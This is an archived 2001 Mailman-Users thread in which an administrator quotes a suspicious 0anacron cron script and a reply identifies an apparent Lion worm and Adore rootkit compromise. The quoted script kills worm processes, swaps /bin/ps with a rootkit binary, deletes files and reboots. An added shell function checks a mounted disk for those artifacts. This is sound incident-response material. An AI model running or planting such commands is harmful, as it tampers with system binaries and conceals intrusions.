[Mailman-Users] What is ADORE

Steve Pirk orion at deathcon.com
Mon Apr 23 22:50:14 CEST 2001


I would say that your box has been hacked. Most likely with
a variation of the l10n (lion) worm. I would pull it
off the network and run a rootkit scan on it.

Check out http://www.sans.org/ for info. Look at the 
Alerts and Analysis section.

The script that is running looks like it is "cleaning up" the
hacker's code that is running on your box...

Anyone else have any input?

Steve
--
Steve Pirk
orion at deathcon.com . deathcon.com . pirk.com . webops.com . t2servers.com 

On Mon, 23 Apr 2001 MikeT at scitechsoft.com wrote:

> Is this a virus?
> Is this `below' the correct anacron file?
> 
> Help???
> 
> Thanks
> miket
> 
> I am experiencing some trouble with our list server.  It is rebooting every five minutes 
> or so.  I have tracked it down to the anacron service and /etc/cron.daily/0anacron
> 
> #!/bin/sh
> if [ -f /sbin/reboot ]; then
> mv /usr/bin/adore /bin/ps
> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> /sbin/reboot
> exit 0
> fi
> killall -9 lpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 lpd7.sh >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-statd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-wu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-ftpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuftpd26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuscan >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hackwu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hacklpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 scan.pl >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 .bla >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 xargs >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 cat >>/dev/null 2>>/dev/null 3>>/dev/null
> mv /usr/bin/adore /bin/ps
> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> 
> 
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>      SciTech Software, Inc.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Michael E. Todd 
> Chico, CA  95928
> 530-894-8400 #151
> 
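
Added example (not part of the original thread): a small triage check, meant to be run from a clean machine against a mounted copy of the suspect disk, that looks for the files and commands named in the quoted 0anacron script. The function name and the mount point argument are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example: look for the artifacts referenced by the quoted
# /etc/cron.daily/0anacron script under a mounted filesystem root.
# Usage (hypothetical mount point): check_adore_artifacts /mnt/suspect

report() {
    printf 'FOUND: %s\n' "$1"
    findings=$((findings + 1))
}

# Prints one line per finding. Returns 0 if nothing was found, 1 otherwise.
check_adore_artifacts() {
    root=${1:-/}
    root=${root%/}          # "/" becomes "" so paths join cleanly
    findings=0

    # Paths the quoted script moves or deletes.
    for p in /usr/bin/adore /usr/lib/lib /usr/lib/lib/0anacron-bak; do
        if [ -e "$root$p" ]; then
            report "$p exists"
        fi
    done

    # A daily cron job has no reason to touch /bin/ps, a hidden
    # /usr/lib/lib directory, or /sbin/reboot.
    cron="$root/etc/cron.daily/0anacron"
    if [ -f "$cron" ]; then
        if grep -q '/usr/lib/lib' "$cron"; then
            report "0anacron references /usr/lib/lib"
        fi
        if grep -Eq 'mv[[:space:]].*[[:space:]]/bin/ps' "$cron"; then
            report "0anacron overwrites /bin/ps"
        fi
        if grep -q '/sbin/reboot' "$cron"; then
            report "0anacron calls /sbin/reboot"
        fi
    fi

    [ "$findings" -eq 0 ]
}
```

A clean result does not clear the host: the quoted script restores the original 0anacron and deletes /usr/lib/lib once it has run, so /bin/ps still has to be compared against known-good media.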




